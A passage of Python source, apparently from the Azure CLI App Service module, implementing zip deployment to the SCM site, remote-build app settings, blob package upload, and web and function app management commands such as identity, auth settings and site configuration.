raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because sometimes if the plan is created as part of function app,
# it can take a couple of tries before it gets the plan
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote and app.reserved:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
elif app.reserved:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check the status of async deployment
if res.status_code == 202:
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
# check if there's an ongoing process
if res.status_code == 409:
raise UnclassifiedUserFault("There may be an ongoing deployment or your app setting has "
"WEBSITE_RUN_FROM_PACKAGE. Please track your deployment in {} and ensure the "
"WEBSITE_RUN_FROM_PACKAGE app setting is removed. Use 'az webapp config "
"appsettings list --name MyWebapp --resource-group MyResourceGroup --subscription "
"MySubscription' to list app settings and 'az webapp config appsettings delete "
"--name MyWebApp --resource-group MyResourceGroup --setting-names <setting-names> "
"to delete them.".format(deployment_status_url))
# check if an error occured during deployment
if res.status_code:
raise AzureInternalError("An error occured during deployment. Status Code: {}, Details: {}"
.format(res.status_code, res.text))
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current) / float(total))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.utcnow()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ex:
# This SDK function throws an error if Status Code is 200
if ex.status_code != 200:
raise ex
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code != 200:
raise ex
def show_webapp(cmd, resource_group_name, name, slot=None):
return _show_app(cmd, resource_group_name, name, "webapp", slot)
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None, # pylint: disable=unused-argument
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs): # pylint: disable=unused-argument
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.begin_create_or_update_slot if slot else client.web_apps.begin_create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(cmd, instance, client_affinity_enabled=None, https_only=None, minimum_elastic_instance_count=None,
prewarmed_instance_count=None):
if 'function' in instance.kind:
raise ValidationError("please use 'az functionapp update' to update this function app")
if minimum_elastic_instance_count or prewarmed_instance_count:
args = ["--minimum-elastic-instance-count", "--prewarmed-instance-count"]
plan = get_app_service_plan_from_webapp(cmd, instance, api_version="2021-01-15")
sku = _normalize_sku(plan.sku.name)
if get_sku_tier(sku) not in ["PREMIUMV2", "PREMIUMV3"]:
raise ValidationError("{} are only supported for elastic premium V2/V3 SKUs".format(str(args)))
if not plan.elastic_scale_enabled:
raise ValidationError("Elastic scale is not enabled on the App Service Plan. Please update the plan ")
if (minimum_elastic_instance_count or 0) > plan.maximum_elastic_worker_count:
raise ValidationError("--minimum-elastic-instance-count: Minimum elastic instance count is greater than "
"the app service plan's maximum Elastic worker count. "
"Please choose a lower count or update the plan's maximum ")
if (prewarmed_instance_count or 0) > plan.maximum_elastic_worker_count:
raise ValidationError("--prewarmed-instance-count: Prewarmed instance count is greater than "
"the app service plan's maximum Elastic worker count. "
"Please choose a lower count or update the plan's maximum ")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
if minimum_elastic_instance_count is not None:
from azure.mgmt.web.models import SiteConfig
# Need to create a new SiteConfig object to ensure that the new property is included in request body
conf = SiteConfig(**instance.site_config.as_dict())
conf.minimum_elastic_instance_count = minimum_elastic_instance_count
instance.site_config = conf
if prewarmed_instance_count is not None:
instance.site_config.pre_warmed_instance_count = prewarmed_instance_count
return instance
def update_functionapp(cmd, instance, plan=None, force=False):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise ResourceNotFoundError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info, force)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance, force):
general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise ResourceNotFoundError('Could not determine the current plan of the functionapp')
# Ensure all plans involved are windows. Reserved = true indicates Linux.
if src_plan_info.reserved or dest_plan_instance.reserved:
raise ValidationError('This feature currently supports windows to windows plan migrations. For other '
'migrations, please redeploy.')
src_is_premium = is_plan_elastic_premium(cmd, src_plan_info)
dest_is_consumption = is_plan_consumption(cmd, dest_plan_instance)
if not (is_plan_consumption(cmd, src_plan_info) or src_is_premium):
raise ValidationError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
if not (dest_is_consumption or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise ValidationError('You are trying to move to a plan that is not a Consumption or an '
'Elastic Premium plan. ' +
general_switch_msg)
if src_is_premium and dest_is_consumption:
logger.warning('WARNING: Moving a functionapp from Premium to Consumption might result in loss of '
'functionality and cause the app to break. Please ensure the functionapp is compatible '
'with a Consumption plan and is not using any features only available in Premium.')
if not force:
raise RequiredArgumentMissingError('If you want to migrate a functionapp from a Premium to Consumption '
'plan, please re-run this command with the \'--force\' flag.')
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.begin_create_or_update(resource_group_name, name, site_envelope=instance)
def get_functionapp(cmd, resource_group_name, name, slot=None):
function_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not function_app or 'function' not in function_app.kind:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return function_app
def show_functionapp(cmd, resource_group_name, name, slot=None):
return _show_app(cmd, resource_group_name, name, 'functionapp', slot)
def list_webapp(cmd, resource_group_name=None):
full_list = _list_app(cmd.cli_ctx, resource_group_name)
# ignore apps with kind==null & not functions apps
return list(filter(lambda x: x.kind is not None and "function" not in x.kind.lower(), full_list))
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_restore_from_deleted_app',
slot, request)
def list_function_app(cmd, resource_group_name=None):
return list(filter(lambda x: x.kind is not None and "function" in x.kind.lower(),
_list_app(cmd.cli_ctx, resource_group_name)))
def _show_app(cmd, resource_group_name, name, cmd_app_type, slot=None):
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not app:
raise ResourceNotFoundError("Unable to find {} '{}', in RG '{}'.".format(
cmd_app_type, name, resource_group_name))
app_type = _kind_to_app_type(app.kind) if app else None
if app_type != cmd_app_type:
raise ResourceNotFoundError(
"Unable to find {app_type} '{name}', in resource group '{resource_group}'".format(
app_type=cmd_app_type, name=name, resource_group=resource_group_name),
"Use 'az {app_type} show' to show {app_type}s".format(app_type=app_type))
app.site_config = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration',
slot, api_version="2021-01-15")
_rename_server_farm_props(app)
_fill_ftp_publishing_url(cmd, app, resource_group_name, name, slot)
return app
def _kind_to_app_type(kind):
if "workflow" in kind:
return "logicapp"
if "function" in kind:
return "functionapp"
return "webapp"
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = []
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def _build_identities_info(identities):
from ._appservice_utils import MSI_LOCAL_ID
identities = identities or []
identity_types = []
if not identities or MSI_LOCAL_ID in identities:
identity_types.append('SystemAssigned')
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities:
identity_types.append('UserAssigned')
identity_types = ','.join(identity_types)
info = {'type': identity_types}
if external_identities:
info['userAssignedIdentities'] = {e: {} for e in external_identities}
return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
'ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
_, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_types = ResourceIdentityType.user_assigned
else:
identity_types = ResourceIdentityType.system_assigned
if webapp.identity:
webapp.identity.type = identity_types
else:
webapp.identity = ManagedServiceIdentity(type=identity_types)
if external_identities:
if not webapp.identity.user_assigned_identities:
webapp.identity.user_assigned_identities = {}
for identity in external_identities:
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update',
extra_parameter=webapp, slot=slot)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
web_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not web_app:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return web_app.identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
IdentityType = cmd.get_models('ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
_, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity is None:
return webapp
to_remove = []
existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
if external_identities:
to_remove = {x.lower() for x in external_identities}
non_existing = to_remove.difference(existing_identities)
if non_existing:
raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
if not list(existing_identities - to_remove):
if webapp.identity.type == IdentityType.user_assigned:
webapp.identity.type = IdentityType.none
elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
webapp.identity.type = IdentityType.system_assigned
webapp.identity.user_assigned_identities = None
if remove_local_identity:
webapp.identity.type = (IdentityType.none
if webapp.identity.type == IdentityType.system_assigned or
webapp.identity.type == IdentityType.none
else IdentityType.user_assigned)
if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
webapp.identity.user_assigned_identities = {}
if to_remove:
for identity in list(existing_identities - to_remove):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
else:
for identity in list(existing_identities):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
if runtime_version is None:
return True
if runtime_version.startswith("~") and len(runtime_version) > 1:
try:
int(runtime_version[1:])
except ValueError:
return False
return True
split_versions = runtime_version.split('.')
if len(split_versions) != 3:
return False
for version in split_versions:
try:
int(version)
except ValueError:
return False
return True
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
# validate runtime version
if not is_auth_runtime_version_valid(runtime_version):
raise CLIError('Usage Error: --runtime-version set to invalid value')
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot)
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
return [s['displayName'] for s in runtime_helper.stacks]
def list_runtimes_hardcoded(linux=False):
if linux:
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['linux']]
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['windows']]
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None): # pylint: disable=unused-argument
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': get_az_user_agent()
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p].value,
'type':result.properties[p].type,
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
try:
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
except StopIteration:
pass
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
if not web_app:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
linux_fx = fx_version if (web_app.reserved or not web_app.is_xenon) else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any(linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
vnet_route_all_enabled=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled', 'vnet_route_all_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
